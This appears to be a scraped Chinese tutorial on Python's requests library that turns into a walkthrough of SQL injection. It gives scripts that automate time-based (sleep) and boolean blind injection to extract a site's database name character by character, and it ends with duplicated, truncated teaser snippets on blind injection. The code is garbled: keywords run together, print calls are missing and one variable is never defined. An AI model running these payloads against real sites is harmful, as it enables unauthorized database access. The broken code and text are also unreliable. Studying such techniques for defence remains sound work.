pip install requestsget請求
post請求
res=request.get(url,params=data)
res=request.post(url,data)
這裡res是響應response 的縮寫;
括號裡也有很多引數:
1. url
2. header
3. params(get請求)
4. data(post請求)
5. files
6. cookies
等等;
import requests
import string
url =
""defiftimeout
(url)
:try
: res = requests.get(url,timeout=3)
return res.text
except exception as e:
return
"timeout"
dbnamelen =
0while
true
: dbnamelen+=
1 dbnamelen_url = url+
"?id=1'+and+if(length(database())="
+str
(dbnamelen)
+",sleep(5),1)--+"
print
(dbnamelen_url)
if"timeout"
in iftimeout(dbnamelen_url)
:print
("庫長:"
,dbnamelen)
break
#暴庫長 庫長為8
dbname=
""for i in
range(1
,9):
for j in string.ascii_lowercase:
dbname_url=url+
"?id=1'+and+if(substr(database(),"
+str
(i)+
",1)='"
+j+"',sleep(5),1)--+"
print
(dbname_url)
if"timeout"
in iftimeout(dbname_url)
: dbname+=j
print
("庫名:"
,dbname)
break
#暴庫名
)#暴庫長
dbnamelen =
0while
true
: dbnamelen_url = url+
"?id=1'+and+length(database())="
+str
(dbnamelen)
+"--+"
(dbnamelen_url)
iflen
(requests.get(dbnamelen_url)
.text)
== htmllen:
("the length of dbname:"
+str
(dbnamelen)
)break
if dbnamelen ==30:
("error!"
) dbnamelen+=
1#暴庫名
dbname =
""for i in
range(1
,9):
for j in string.ascii_lowercase:
dbname_url=url+
"?id=1'+and+substr(database(),"
+str
(i)+
",1)='"
+j+"' --+"
iflen
(requests.get(dbname_url)
.text)
== htmllen:
dbname += j
(dbname)
break
跑出來的庫名和上圖一樣
SQL注入之延遲盲注
延遲盲注 你不知道你輸入的資料在sql被執行後是否是正確或錯誤的。你只知道有資料。利用原理 借助if語句,如果正確就sleep 5 延遲5秒返回資料。通過資料返回的時間大小判斷自己的語句是否正確執行。因為如果正確執行,會休眠5秒。錯誤執行,立馬返回!0x01 是布林盲注還是延遲盲注 這麼明顯錯誤的語...
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...
sql注入 盲注
一,盲注介紹 所謂盲注就是在伺服器沒有錯誤回顯的時候完成注入攻擊。盲注分為布林盲注和時間盲注 布林盲注 boolean 根據注入資訊返回true or fales 沒有任何報錯資訊 時間盲注 介面返回值ture 無論輸入任何值,返回的情況都是正常的來處。加入特定的時間函式,通過檢視web頁面返回的時...